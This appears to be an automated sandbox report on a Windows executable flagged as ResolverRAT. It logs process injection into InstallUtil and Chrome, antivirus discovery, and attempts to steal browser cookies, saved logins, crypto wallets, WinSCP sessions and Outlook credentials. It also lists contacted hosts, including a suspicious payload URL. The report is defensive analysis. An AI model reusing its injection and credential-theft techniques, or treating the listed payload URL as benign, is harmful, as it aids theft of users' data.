Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48E000	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E91008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14C0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 4C0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 11F80000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F80000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 247D0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7D0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 20E00000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: E00000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 9070000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 70000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1CC60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: C60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7450000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 450000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 12160000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F90000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22810000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 810000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 249B0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7E0000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 7970000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 970000	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Queries volume information: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected ResolverRAT

Source: Yara match

File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	41 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Scheduled Task/Job	1 DLL Side-Loading	1 Extra Window Memory Injection	12 Obfuscated Files or Information	1 Credentials in Registry	134 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	11 Scheduled Task/Job	311 Process Injection	1 Software Packing	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Source	Detection	Scanner	Label	Link
BSN100357-HHGBM100002525.exe	39%	Virustotal		Browse
BSN100357-HHGBM100002525.exe	31%	ReversingLabs	Win32.Malware.Heuristic
SAMPLE	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
ogads-pa.clients6.google.com	142.250.176.202	true	false	high
plus.l.google.com	142.250.80.78	true	false	high
play.google.com	142.250.80.78	true	false	high
www.google.com	142.250.80.100	true	false	high
googlehosted.l.googleusercontent.com	142.251.40.225	true	false	high
www.vastkupan.com	185.15.121.100	true	false	unknown
clients2.googleusercontent.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.vastkupan.com/wp-admin/js/Daupinslenj.pdf	false		unknown
http://c.pki.goog/r/r4.crl	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000009.00000003.1515971121.0000610C01B38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516745409.0000610C01B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516474004.0000610C01B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517021522.0000610C01BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516917913.0000610C01B9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517146415.0000610C01BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517304811.0000610C01BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517260747.0000610C01BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1489292104.0000610C01B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516160661.0000610C01B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515294312.0000610C01B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515851887.0000610C01B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517069798.0000610C01BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517399389.0000610C01BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516574713.0000610C01B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515627709.0000610C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516864377.0000610C01B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516971151.0000610C01BA4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://goto.google.com/sme-bugs2e	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000012.00000000.1627681006.0000174400284000.00000004.00000001.00020000.00000000.sdmp	false	high
https://gemini-dev.corp.google.com	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.broofa.com	chrome.exe, 00000009.00000003.1747947431.0000610C02330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1748619590.0000610C01404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.google.com25	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/callout?eom=1&dc=1	chrome.exe, 00000012.00000000.1627681006.0000174400284000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/report-to/one-google-eng	chrome.exe, 00000012.00000000.1627312655.0000174400214000.00000004.00000001.00020000.00000000.sdmp	false	high
https://gemini.google.com	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.citSWp3NP7U.O/m=gapi_iframes	chrome.exe, 00000012.00000003.1849210701.000001E300040000.00000004.00000001.00020000.00000000.sdmp	false	high
https://ogads-pa.clients6.google.comU	chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	false	high
https://crbug.com/368855.)	chrome.exe, 00000011.00000002.1614682841.00004FCC0036C000.00000004.00000001.00020000.00000000.sdmp	false	high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	false	high
https://csp.withgoogle.com/csp/	chrome.exe, 00000012.00000000.1634149050.0000174400770000.00000004.00000001.00020000.00000000.sdmp	false	high
https://web.whatsapp.com/	chrome.exe, 00000009.00000003.1517883635.0000610C01C20000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://assets.adobedtm.com	chrome.exe, 00000009.00000003.1518703844.0000610C0104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003D4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/chat/	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/J	chrome.exe, 00000009.00000003.1518357941.0000610C01C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518050423.0000610C01C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517801516.0000610C01C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518122462.0000610C01C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517926789.0000610C01C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518294153.0000610C01C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517755506.0000610C01C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517883635.0000610C01C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518264210.0000610C01C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://calendar.google.com	chrome.exe, 00000009.00000003.1458349676.0000610C01478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486603570.0000610C004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458260163.0000610C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486703514.0000610C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497950032.00000F3C00AC8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497385618.00000F3C00934000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.google.com/intl/en-GB/about/products?tab=rh	chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	false	high
https://drive.google.com/	chrome.exe, 00000009.00000003.1517883635.0000610C01C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516971151.0000610C01BA4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdnjs.cloudflare.com/ajax/libs/mathjax/;secured-pixel.com;Can	chrome.exe, 00000009.00000003.1748619590.0000610C01404000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/?lfhs=2	chrome.exe, 00000009.00000003.1515971121.0000610C01B38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516745409.0000610C01B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516474004.0000610C01B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517021522.0000610C01BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516917913.0000610C01B9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517146415.0000610C01BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517304811.0000610C01BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517260747.0000610C01BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516160661.0000610C01B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515294312.0000610C01B08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515851887.0000610C01B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517069798.0000610C01BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517399389.0000610C01BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516574713.0000610C01B7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515627709.0000610C01B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516864377.0000610C01B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515777473.0000610C01B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516971151.0000610C01BA4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstorehttps://chromewebstore.google.com/6EAED1924DB611B6EEF2A664BD077BE7	chrome.exe, 0000000B.00000002.1469099908.000030080004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1487187700.00000F380004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1577458301.00004FC80004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1623521160.000017400004C000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002961000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/intl/en-GB/about/products?tab=rhU	chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	false	high
http://google.com/a-co	chrome.exe, 0000000C.00000000.1488602278.00000F3C00069000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1616596865.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587584119.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631009401.0000174400529000.00000004.00000001.00020000.00000000.sdmp	false	high
https://duckduckgo.com/?q=	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore	chrome.exe, 00000012.00000000.1627142529.00001744001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1630609921.00001744004E4000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.google.com/U	chrome.exe, 0000000C.00000000.1483842298.0000021E00100000.00000004.00000001.00020000.00000000.sdmp	false	high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.google.com/gemini?p=chrome_min_win2R	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-4.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://myaccount.google.com/shielded-email?utm_source=chrome2B	chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogads-pa.clients6.google.com	chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/imghp?hl=en-GB&tab=ri&ogbl	chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://plus.google.com	chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	false	high
